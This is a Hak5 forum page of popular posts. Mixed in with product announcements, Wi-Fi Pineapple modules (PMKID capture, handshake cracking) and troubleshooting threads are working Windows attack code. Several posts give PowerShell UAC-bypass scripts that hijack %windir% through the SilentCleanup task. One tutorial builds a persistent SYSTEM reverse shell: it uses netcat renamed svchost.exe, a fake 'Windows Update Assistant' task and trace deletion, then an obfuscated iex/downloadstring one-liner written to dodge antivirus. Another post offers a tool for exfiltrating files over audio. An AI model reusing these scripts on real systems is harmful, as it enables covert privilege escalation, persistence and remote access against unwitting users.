Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation since 02/26/2019 in all areas

  1. 3 points
    Here you go, new version. @Darren Kitchen @lokiuox https://github.com/PoSHMagiC0de/Invoke-TaskCleanerBypass It uses dynamic parameters and can take in the standard posh base64 encoded commands or a file location of your script. As far as the bypass thing. Just run it as an encoded command. Better yet, here is a good way to launch it. πŸ˜› Just create a encoded stager to downloadstring the bypass script from web server and execute with "Invoke-Expression" IEX for short with the command. You probably can take this function, add after it the command to run it with your parameters and encode the whole thing to run. No bypass to execution policy needed. Anyway, look at the script. Some modifications were needed to the reg hack. I needed to use cmd /c in front so I could escape the appended stuff that gets added when ran like the cleaner command. That was breaking the exploit. So the new reg entry is cmd /c yourpayload & :: That runs the command and then rems out whatever else is there. SQL injection for registries. πŸ˜› Since I won the competition this month so I am not payloading this. Someone else can run with this and create a BB payload. I know a few ways to use it but someone else can have a turn. FYI: It checks if you have Win10, member of local admins and already UAC bypassed. Will run if bypassed, will do nothing if not on 10 or greater and/or not a local admin.
  2. 2 points
    Hi all - We're excited to introduce a new bit of kit to the Hak5 arsenal – the Plunder Bug! It's a smart LAN Tap with a new take on Packet Sniffing! This is a bit of kit I've been wanting for myself for quite a long time, as I've never been satisfied with the traditional RJ45 Ethernet-based LAN Taps, and if we were going to make one we'd make it special with the ability to act as not just a tap but a mini-switch and a USB Ethernet adapter all in one. It's sweet and simple with the convenience of USB-C and a very small form-factor while sporting some features you won't find in your typical LAN Taps – like the integrated USB Ethernet adapter (yay, no more mess of cables and dongles!), the ability to make passive captures or active scans (acting sort of like an unmanaged switch), and a companion Android root app that makes it possible to capture packets right from your phone! You can find the device for sale now at https://shop.hak5.org/products/bug The documentation can be found at https://docs.hak5.org/hc/en-us/categories/360001482953-Plunder-Bug And the connection scripts are available in the Hak5 Download Center at https://downloads.hak5.org/ and on our Github at https://github.com/hak5/plunderbug-scripts As for the tech, we've packed in a 10/100 Base-T Fast Ethernet switch with the mirrored traffic heading to the integrated USB Ethernet adapter (ASIX AX88772C chipset) and the whole thing is powered over USB-C with a very low draw around 200-300 mA. INB4 it's compatible with gigabit links in that it'll drop 'em to 100 Mbit. I'll post a video here shortly – stay tuned! Huge props to the ever growing Hak5 dev team and their awesome work putting together these scripts and the killer Android app (more on that soon) and as always thanks again to you guys for being the awesome Hak5 community that you are, for your feedback and contributions and making this place somewhere all hackers belog πŸ™‚
  3. 2 points
    function sudo { $command = "powershell -noexit " + $args + ";#"; Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value $command ; schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I; Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir" } Quick function that works like sudo πŸ™‚
  4. 2 points
    Hi everyone! First of all, sorry if my English is not that good, It's not my main language. I just signed up to the forum to post this, after watching the video Darren made about a payload that changes the Desktop background. I had this idea after he mentioned that the Lockscreen background could not be changed due to the fact that there isn't a "stable" method and it needed admin privileges. So I made a script which, when opened as standard user, respawns itself in a hidden window with full admin privileges and executes whatever payload you put in it. Here it is: if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) { #Payload goes here #It'll run as Administrator } else { $registryPath = "HKCU:\Environment" $Name = "windir" $Value = "powershell -ep bypass -w h $PSCommandPath;#" Set-ItemProperty -Path $registryPath -Name $name -Value $Value #Depending on the performance of the machine, some sleep time may be required before or after schtasks schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null Remove-ItemProperty -Path $registryPath -Name $name } Explanation: There's a task in Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe Since it runs as Users, and we can control user's environment variables, we can change %windir% (normally pointing to C:\Windows) to point to whatever we want, and it'll run as admin. The first line if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) basically checks if we are admin, so that the script can detect whether it has been called by the user or by the task, and do stuff accordingly. Everything that need admin privs goes in this block of the if statement, while in the "else" block goes what can be run as standard user, including the bypass itself. The "Set-ItemProperty" line creates a new Registry Key "HKCU:\Environment\windir" in order to change the %windir% variable value to the command we want to be run as admin, in this case powershell -ep bypass -w h $PSCommandPath;# "$PSCommandPath" evaluates to our script path, "-ep bypass" is equal to "-ExecutionPolicy bypass" and "-w h" to "-WindowStyle hidden". The ";#" part is needed to comment out the rest of the path of the task from the command. So, in the end, the task's execution path evaluates to: powershell -ExecutionPolicy bypass -WindowStyle hidden <path of the script> ;#\System32\cleanmgr.exe The "schtasks" command will simply ask Windows to run the task with the now modified %windir% and "Remove-ItemProperty" will just delete the reg key after the task has been executed in order to not break other things and/or leave traces of the "attack". When the task runs, it will call the script with full fledged admin privs, so now the first block of the if statement is executed and our payload can do whatever we want. Note: In order to work, the code must be saved in a script file somewhere, it cannot be run directly from powershell or from the run dialog. However, if our payload is small enough to fit entirely in the %windir% variable, we can reduce the whole script to just the three fundamental lines, i.e. "Set-ItemProperty", "schtasks" and "Remove-ItemProperty". (Idk if it can fit in the run dialog though) Note2: I think it could break if the the script is in a path that contains spaces, but I think it's easily fixable by escaping the $PSCommandPath in the $Value variable
  5. 2 points
    ## Use powershell -ep byppass .\script.ps1 to launch ## ## Fixed an issue where if there are spaces in the script path. ## ## Added option for interactive window, comment out the code to change back to hidden ## ## Current example below opens and Admin powershell window ## if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) { #Payload goes here #It'll run as Administrator powershell.exe } else { $registryPath = "HKCU:\Environment" $Name = "windir" #Use for hidden window #$Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#" #Use for interactive window $Value = "powershell -ExecutionPolicy bypass -Command `"& `'$PSCommandPath`'`";#" Set-ItemProperty -Path $registryPath -Name $name -Value $Value #Depending on the performance of the machine, some sleep time may be required before or after schtasks schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null Remove-ItemProperty -Path $registryPath -Name $name } Fixed an issue with spaces in the script path.
  6. 2 points
  7. 2 points
    https://www.mercari.com/us/item/m46935763151/?gclsrc=aw.ds&&utm_source=google&utm_medium=cpc&utm_campaign=1709941428&utm_content=t0&adgroup=70707275910&network=g&device=m&merchant_id=130862017&product_id=m46935763151&product_id=301541986033&gclid=Cj0KCQiAn4PkBRCDARIsAGHmH3dO2yZdFtPlK97vqqjcaW37yIBKogxdThVUDb44bHGpQepxon3g9GsaAk22EALw_wcB
  8. 2 points
    Make sure you're giving it enough time to flash the firmware. How long have you waited? Make sure you're specifying the IP and Port, at http://172.16.42.1:1471.
  9. 1 point
    HELLO Hak5 COMMUNITY! This is my first thread. I have written a program that exfiltrates files over audio waves. Technical information: ======================= Protocol : AFSK1200 x25 packet radio Fire-And-Forget mod Baud rate: 1200bps stable(0.15 KBytes/second, 10 kilobytes/minute) Language : C# .NET 3.5 ======================= I have written this for the [Payload] segment of Hak5. As i am too poor to buy a rubber ducky[not kidding] ,it would be cool if someone would make a rubber ducky payload out of this. I am dreaming of a rubber ducky... This program takes as input a file, [binary data of any kind] and convert it to a .wav file, that would be then played, and the audio output would be recorded with a smartphone.Then, it takes a .wav input and converts it to a file [only supports utf8 ATM, if you plan on decoding other binary data, use minimodem or one of the tens of other FSK decoders out there]. THIS IS JUST A PoC script ! It proves that the concept of stealing files over audio is possible! Source Code Download for pre-build binary [merged and not obfuscated] : HERE Obfuscated assembly : HERE Hope you like it!
  10. 1 point
    Link to my original reddit post So how do we create such reverse shell? Well, first of all you need to download netcat 1.12 and extract the nc64.exe. Once you got it extracted upload it to some file-hosting service of your choice, which provides DIRECT LINK (very important!!). I used Discord, works like charm and link doesn't expire. Second, you need to make yourself an .XML file which you're gonna need later for Task Scheduler. I believe scheduled tasks are rly good way to set up persistence, as well as escelating the file that it executes to NT Authority\SYSTEM privileges, while remaining stealthy. I already did the work for you. This is what it should look like. Just modify the arguments in the bottom to your IP/PORT. Once you got that done, save it and upload it for DIRECT LINK, just like you uploaded your previous file. Now, that the boring setup part is over, we get to the actual code that's being executed to achieve this type of shell: cd $env:public $url1="YOUR_NC64_LINK" $url2="YOUR_XML_LINK" $path1="$env:public\svchost.exe" $path2="$env:public\x.xml" (new-object net.webclient).downloadfile($url1,$path1) (new-object net.webclient).downloadfile($url2,$path2) cmd /r 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f&reg add "HKCU\Environment" /v "windir" /d "%comspec% /r mode 18,1&cd %public%&schtasks /create /tn \"Windows Update Assistant\" /f /xml x.xml >nul&schtasks /run /tn \"Windows Update Assistant\" /i >nul&REM "&timeout /t 1&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul&timeout /t 1&reg delete "HKCU\Environment" /v "windir" /F&attrib +s +h svchost.exe&del /q x.xml' So first, it downloads both of your files via powershell, then it clears our Windows + R history to clear any traces of itself (if you're using USB RubberDucky). Then it uses this UAC bypass technique to create scheduled task called Windows Update Assistant, which is set to be executed to run with NT Authority\SYSTEM privileges in our .XML file. Then it marks our nc64.exe file as hidden system file, which is also now called svchost.exe and then it deletes our .XML file, since system doesn't need it anymore after task is created. Now you're probably thinking, this is all nice, but how the fk do I run this in one-line of code? Very simple, by invoking expression called DownloadString in powershell like this: powershell -nop -w 1 -c "iex (new-object net.webclient).downloadstring('YOUR_PASTEBIN')" But problem with this one-liner is, that it gets picked up by most AVs as "malicious activity". Therefore, we need to obfuscate it a bit: cmd.exe /c powershell -nop -w 1 -c "iex (.('ne'+'w-ob'+'ject') ('ne'+'t.webc'+'lient')).('do'+'wnloadstr'+'ing').invoke(('Y'+'OUR_'+'PASTEBIN'))" And there it is, this one liner will get you persistent reverse shell which will check for itself every minute if it's running and if it's not, then it executes itself silently in the background.
  11. 1 point
    I see the NANO and TETRA have been on sale, and the NANO is now all sold out. Could it be there is a new Pineapple generation on the horizon? Would anyone form hak5 care to comment?
  12. 1 point
    I ran into the same problem with my turtle. Following all of the reset steps nothing seemed to work. After contacting support I was told it was out of warranty and that they wouldn't be able to swap it out. No big deal. That just meant I could pull out the soldering iron and not risk breaking something that wasn't already a brick. Step 1: Remove the casing from the Lan Turtle (you should have already done this if you followed the factory reset steps and it failed) Step 2: Turn the Lan Turtle so that the ethernet connector is on top and on the left side of the board. Step 3: Locate the two empty solder pads just above the AR9331 chip (if your turtle is like mine). These two pads are the UART TX and RX pads for hooking up a serial connector. Step 4: Carefully solder two wires onto the UART pads and one ground wire to either the shielding connector on the USB or Ethernet connectors. Step 5: Hook the wire on the left to the RX on your serial adapter and the right cable to TX on your serial adapter. Hook the ground to the ground connector. Step 6: Plug the Lan Turtle in.. and open a serial terminal at 115200, 8, N, 1 then hit enter to get the lan turtle menu. Step 7: Disable and remove all modules then reset your password. Unplug your Turtle and plug it back in. You should be able to then SSH to the device and perform a manual update.
  13. 1 point
    Could even go so far as to fax that letter ...
  14. 1 point
    Name: PMKIDAttackAuthor: n3d.b0yPlatform: Tetra / NANOVersion: 1.2GitHub: https://github.com/n3d-b0y/PMKIDAttackDescription: This module makes it easy to capture PMKID. We scan the network, click the attack button opposite the attacked access point and wait for the result. After we receive PMKID, attacks it will automatically stop and the file with hashes will go to the Captured block where you can download it. Module installation for Tetra: opkg update && opkg install git git-http cd /pineapple/modules/ git clone https://github.com/n3d-b0y/PMKIDAttack.git PMKIDAttack chmod +x -R /pineapple/modules/PMKIDAttack/scripts Module installation for NANO: opkg update && opkg --dest sd install install git git-http cd /sd/modules/ git clone https://github.com/n3d-b0y/PMKIDAttack.git PMKIDAttack chmod +x -R /sd/modules/PMKIDAttack/scripts You can also contact me in this thread: https://codeby.net/threads/6-wifi-pineapple-pmkidattack.66709/
  15. 1 point
    Just a thought about running on systems that block .ps1 files. In some cases you can open the powershell_ise.exe paste the script and hit F5 to run.
  16. 1 point
    I did make it work that way. Actually I ran: powershell -ep bypass which gave me a new shell ready to run the script. But when I ran I realized: SilentCleanup task runs as "Users" and not administrator I realized the script goes into loop, because the user is never a member of group "S-1-5-32-544" so it recursively calls itself. I changed value of windir to "powershell -ep bypass -Command mkdir c:\windows\uac-bypass;pause;#" so I could pause and see what was going on. it Said: That seems to have correctly ran what I wanted mkdir and a pause, the rest was ignored, but still it seems it doesn't have permissions. Am I missing something here?
  17. 1 point
    You shouldn’t worry yourself with that. It’s not polite, right or legal. Instead send a sincere, nice hand written letter letting them know your feeling.
  18. 1 point
    I have heard that using a hammer will stop blinking thingies
  19. 1 point
    https://youtu.be/qwZsCRcUsFA
  20. 1 point
    You can also join the discord server or IRC and ask/chat there, don't always expect immediate responses but the good folks there will point you in right direction.
  21. 1 point
    Have you read the one at docs.hak5.org yet? The one at wiki.wifipineapple.com is little bit old.
  22. 1 point
    They are supposed to be unique so you don't get replacements, you just get new tags, disable the old ones and enable the new ones.
  23. 1 point
    This is not just an old people thing. A lot of ISPs (at least here in Australia anyway) use phone numbers as default wifi passes for the 3G and 4G modems (and many others). And yes I agree, this is a great way to start your brute forcing. You don't need to pipe this through crunch though. You can use hashcat's mask generator πŸ˜‰ hash64.bin -a 3 -m 2500 TelstraA84A9F.hccapx 253?d?d?d?d?d?d?d (this will generate 7 random numbers following "253" which presumably you know). A lot of the netgear modem/routers use a combination of adjective+noun+XXX (where xxx is 3 random digits) e.g. "luckybanana437". I had a list specific to netgear's factory passes somewhere so let me know if you want me to find it and I will upload it somewhere. Netgear Arlo base stations used this for their camera systems as well πŸ˜„ 10 random hex chars is another favourite default pass but that can become unmanageable unless you have multiple GPUs or some really neat rules to minimise the cracking time. I guess it's worth mentioning that rockyou.txt gets a few hits every once in a while as well. Most people never change their default passes so bottom line: doing a bit of research at the start will save you a LOT of brute forcing time down the track πŸ˜‰
  24. 1 point
    Name: HandshakeCrack Author: n3d.b0y Platform: Tetra / NANO Version: 1.1 GitHub: https://github.com/n3d-b0y/HandshakeCrack Description: The module allows you to send the intercepted handshake to the online service of decrypting hashes www.onlinehashcrack.com. Also there is a functional for cavitation handshake. Module installation for Tetra: opkg update && opkg install git git-http cd /pineapple/modules/ git clone https://github.com/n3d-b0y/HandshakeCrack.git HandshakeCrack chmod +x -R /pineapple/modules/HandshakeCrack/scripts Module installation for NANO: opkg update && opkg --dest sd install install git git-http cd /sd/modules/ git clone https://github.com/n3d-b0y/HandshakeCrack.git HandshakeCrack chmod +x -R /sd/modules/HandshakeCrack/scripts You can also contact me in this thread: https://codeby.net/threads/5-wifi-pineapple-handshakecrack.66700/
  25. 1 point
    Update v1.1 Added support for NANO https://github.com/n3d-b0y/HandshakeCrack/releases/tag/v1.1
  26. 1 point
    Update v1.2 Added support for NANO https://github.com/n3d-b0y/PMKIDAttack/releases/tag/v1.2
  27. 1 point
    https://sano.shop/en/products/detail/109345?gclid=Cj0KCQiAn4PkBRCDARIsAGHmH3c1tWHbd59LXI8nZyd0MlVmgHTFYIW2cvPuz_hOi838voyDbbYCkFsaAhaIEALw_wcB one more guess
  28. 1 point
    Hey all, When installing stuff to the sd card, it often needs symlinking to the working directory on the pineapple nano to complete the installation. For one-off's its fine to do manually, but on larger git install's or opkg packages with many folders/files it can be a PITA. So I got to looking around for tools/scripts, I found a few (some better than others) but think I found something that works, and works well on the pineapple YMMV. It has one small sized dependency so can be installed to pineapple nano rather than sd : - opkg update && opkg install coreutils-realpath You can run it multiple times and it will only create links for unlinked files so could be run on the base directory after adding new files like: - aln -s /sd/usr/ -d /usr/ I have been using it for a few days and so far so good, so figured I would share for others to try out. https://github.com/eyit/aln Hopefully its useful to others.
  29. 1 point
    So I managed to get the PMKIDAttack module to run on the pineapple nano and even made a repo for those with the nano, im waiting for n3d.b0y to give me permission to make the repo public
  30. 1 point
    not entirely true , its there, just not activated. Where you would require admin rights to install is : dism /online /Enable-Feature /FeatureName:TelnetClient and / or pkgmgr /iu:”TelnetClient” Or powershell. install-windowsfeature"telnet-client" --- Which i think is a bloody shame since telnet is like a universal Swiss army tool if you want to analyse networking problems and ports. (eg:telnet to a host on port 80/443 to see if the connection is up or not firewalled) However, The site indicated is locked from a lot of locations as port 23 is not open on most firewalls as telnet is unencrypted traffic; hence blocked
  31. 1 point
    after reboot, i got it to show XD, ill test for functionality
  32. 1 point
    with mdk3 ill run some test maybe tonight to see what router models can be forced to reboot and unlock the wps pin module to allow for further progress of pin attempts... im excited to post some example code and explanation of my techniques.
  33. 1 point
    You don't install Tor, it is a service you talk to add a proxy, any application that understands HTTP proxies can use it. If you've got deep packet inspection then I'd keep monitoring it and note what you are doing when it is detected, see if you can spot what apps are running. I'd also run malware detection as malware often uses Tor to hide its C&C channel endpoint.
  34. 1 point
    For my 4 options I have me@mybox.com I have my ssh port I use on mybox.com. 22 I have the port on that box I will see open and use to connect back on 2222 for the last option its the port on my turtle that ssh runs on. 22 I found I had to run it first from the command prompt and approve the server before it would work. Also I put in a crontab to restart every day otherwise I seem to not have a connection when I look for it a month later. YMMV
  35. 1 point
    I gave it like 10 minutes but no luck. so ive tried it a few more times and I finally got it to work. I only had the issue that my sd card wasn't found but after a few reboots that issue also went away! its back up and running now! thanks all for the help!
  36. 1 point
    I've solved this issue. Seems that wp6.sh is stucked in "until ping $spineappleip -c1 -w1 >/dev/null" and isn't able to configure iptables in order to forward traffic from WIFI Pineapple to Ubuntu through shared internet (eth or wireless). https://github.com/hak5darren/wp6/blob/master/wp6.sh ... function connectsaved { if [[ "$sfirsttime" == "1" ]]; then printf "\n Error: Settings unsaved. Run either Guided or Manual setup first.\n"; menu fi ifconfig $spineapplelan $spineapplehostip netmask $spineapplenmask up #Bring up Ethernet Interface directly connected to Pineapple printf "Detecting WiFi Pineapple..." until ping $spineappleip -c1 -w1 >/dev/null do printf "." ifconfig $spineapplelan $spineapplehostip netmask $spineapplenmask up &>/dev/null sleep 1 done printf "...found.\n\n" printf " $(tput setaf 6) _ . $(tput sgr0) $(tput setaf 7)___$(tput sgr0) $(tput setaf 3)\||/$(tput sgr0)\n" printf " $(tput setaf 6) ( _ )_ $(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 7)[___]$(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 3),<><>,$(tput sgr0)\n" printf " $(tput setaf 6) (_ _(_ ,)$(tput sgr0) $(tput setaf 7)\___\\$(tput sgr0) $(tput setaf 3)'<><>'$(tput sgr0)\n" ifconfig $spineapplelan $spineapplehostip netmask $spineapplenmask up #Bring up Ethernet Interface directly connected to Pineapple echo '1' > /proc/sys/net/ipv4/ip_forward # Enable IP Forwarding iptables -X #clear chains and rules iptables -F iptables -A FORWARD -i $spineapplewan -o $spineapplelan -s $spineapplenet -m state --state NEW -j ACCEPT #setup IP forwarding iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A POSTROUTING -t nat -j MASQUERADE route del default #remove default route route add default gw $spineapplegw $spineapplewan #add default gateway printf "\n Browse to http://$spineappleip:1471\n\n" exit } ... I had to set IP/Mask manually on Ubuntu (172.16.42.42, 255.255.255.0) to the network interface (WIFI Pineapple USB connected to Ubuntu's USB port), once completed, I executed the wp6.sh > [A]dvanced IP settings and finally [C]onnect using saved settings. I hope it helps. Regards.
  37. 1 point
    Are you meaning this one? In the Networking tab.
  38. 1 point
  39. 1 point
    I don't know why but this made me lol pretty hard. Blunder Bug does have a certain ring to it... πŸ˜‚
  40. 1 point
    Maybe? ping -c 1 webstite.com If you want all the open ports nmap -p- webstie.com (will only do TCP ports I think -sU does the UDP) Do keep in mind that many websites may 'share' the same IP address on shared hosting.
  41. 1 point
    Awesome, thank you for posting an update. I'll make sure that it's impossible to enter a passphrase via the UI that's too long in the next firmware version.
  42. 1 point
    Just wanna give people a heads up that these tools gets updated almost daily, as I'm trying my best to keep up with the changes from ZerBea. So please, always make sure you're running the latest release. πŸ™‚
  43. 1 point
    Hak5 did it with a yagi a while back πŸ™‚ https://www.hak5.org/episodes/hak5-1515
  44. 1 point
    you can use SCP over SSH or if you prefer a GUI you can use filezilla.
  45. 1 point
    After much chagrin and googling, we found that QuickCreds will not work on the lan turtle because of disk space issues. Here's our fix! (we take no responsibility if you break something/somebody. Only hack when you have prior approval and authorization!) Factory reset, or push the turtle-5.bin firmware to reset (probably need to upgrade to v5 anyway). This makes sure you are set to base. YMMV. Open the lan turtle, push and hold the reset button for at least 5 seconds after plugging it into the machine ssh in to 172.16.84.1, sh3llz, change password Update the modules list Only install QuickCreds for now, so we have enough space Select QuickCreds and configure Let it install it's dependencies You can now set QuickCreds to 'Enable' so that it will start at boot DO NOT REBOOT YET! At this point, we're going to exit and git clone the responder package DO NOT INSTALL RESPONDER FROM THE TURTLE MODULES LIST ITSELF Exit 'turtle' back to a basic root shell Git clone the Responder package first to /tmp since there is plenty of space. git clone git://github.com/lgandx/Responder /tmp/Responder BUT DON'T REBOOT YET, CAUSE YOU'LL LOSE EVERYTHING IN /tmp du -sh /tmp/Responder 3.8M rm -rf /tmp/Responder/.git rm -rf /tmp/Responder/tools/MultiRelay/ du -sh /tmp/Responder 450.5k We also want to remove the git package as it takes up >1MB of space. QuickCreds installs it /only/ to git the Responder package πŸ˜• opkg remove git df -h 1.2M available on / Move the Responder package back to /etc/turtle/ for QuckCreds to find it mv /tmp/Responder/ /etc/turtle/ df -h 1.1M still available on / now (w00t) The QuickCreds module is hardcoded to use br-lan as the interface. This doesn't exist, so we need to change it to eth0. Another πŸ˜• sed -i 's/br-lan/eth0/' /etc/turtle/modules/QuickCreds You should now have at least 1MB of storage on / and plenty of space for /root/loot to write to, as well as have Responder available for QuickCreds Pop the turtle in a Windows system and wait about 30 seconds until the amber light goes solid, CREDS!!! Copy and paste the hash from /root/loot/#/HTTP-NTLMv2-172.16.84.127.txt Paste into a hash file and send it to john with a wordlist john hash.txt --wordlist=wordlist.txt Testing shows this works whether the laptop is locked or not locked. These hashes can not be replayed, only cracked. You still have plenty of space to return to the turtle shell and install any other modules you need at this point. You may need git for something else, but probably not enough space. This set up is for the "Grab creds from a locked Workstation" scenario. You may need MultiRelay for something else...? Not needed for QuickCreds. ENJOY!
  46. 1 point
    Maybe take a look at https://github.com/WiPi-Hunter
  47. 1 point
    After sharing an internet connection with the bash bunny, and then ssh-ing in, the following seemed to work for me when updating the bunny: apt-get update apt-mark hold procps apt-get upgrade When apt-get then listed out what it was going to upgrade, it showed procps as not being upgraded.
  48. 1 point
    Hello! I'm very new to penesting and I'm looking for someone who could help mentor me a little. My TETRA arrived today and I will have a lot of questions on how to get startedone. I have watched all the videos on how to connect it to my phone and PC (and the primer)... Anyway, if any of you want a pet project, I'm willing to learn.
  49. 1 point
    Introduction: This process requires an Android phone capable of running the EasyTether app which can be downloaded here: http://www.mobile-stream.com/a/easytether-device.apk and also possibly an SD card. The Lite version of the app prevents https & udp connection, so to use those you have to pay mobile stream $10 once, which I still think is better than paying your carrier that every month. I do not endorse tethering data without your carrier's permission, proceed at your own risk. I am currently working on a module that will automate this process, if you can't figure out this tutorial you can wait for that or contact me. Setup on Android: Download and install the EasyTether app and follow the in-app instructions for setting up USB Tethering. Setup on the Pineapple: You will need to install EasyTether for Openwrt located here: http://www.mobile-stream.com/easytether/drivers.html I used the OpenWrt 15.05 --openssl which I show being downloaded below. NOTE: You may need an SD card for this as it is a larger file. The below commands assume you have an SD card set up correctly. If you do not with to install to your SD card ignore the --dest sd options below and know that it may not work. root@Pineapple:/sd# wget http://www.mobile-stream.com/beta/openwrt/easytether-usb-openssl_0.8.5-1_openwrt-15.05-rc3.zip Once you downloaded the package, install unzip so you can open the previously downloaded compressed package. (BTW if anybody knows the the two errors at the bottom are let me know, to my knowledge they do not effect the packages being installed. My assumption is that opkg is searching in /usr when it should be looking in /sd/usr). root@Pineapple:/sd# opkg install unzip --dest sd Installing unzip (6.0-3) to sd... Downloading https://downloads.openwrt.org/chaos_calmer/15.05/ar71xx/generic/packages/packages/unzip_6.0-3_ar71xx.ipk. Configuring unzip. grep: /usr/lib/opkg/info/unzip.control: No such file or directory cat: can't open '/usr/lib/opkg/info/unzip.list': No such file or directory Then unzip the EasyTether application. root@Pineapple:/sd# unzip easytether-usb-openssl_0.8.5-1_openwrt-15.05-rc3.zip Then cd to the correct application distribution. root@Pineapple:/sd# cd 15.05-rc3/ar71xx/generic/ Then install the application! root@Pineapple:/sd/15.05-rc3/ar71xx/generic# opkg install easytether-usb-openssl_0.8.5-1_ar71xx.ipk --dest sd After that you can run the application (you do not need to be in any specific directory anymore) root@Pineapple:/sd/15.05-rc3/ar71xx/generic# easytether-usb Now control-C because the Pineapple doesn't have Internet just yet, you need to configure it to allow Internet sharing from Android by running the below command (all the lines at once). cat << EOF >> /etc/config/network config interface 'wan' option ifname 'tap-easytether' option proto 'dhcp' EOF You should be all set and see "Connection Established" if you followed the Android instructions correctly and have Internet on your Pineapple! If you need more help ask me or read MobileStream's tutorial. Good luck guys!
  50. 1 point
    Yeah its hard to gauge what to suggest, everyone will be starting at different levels of expertise and wanting to focus on different areas. Perhaps once we gather a bit more content we should shift this to the Hak.5 Wiki?
×
×
  • Create New...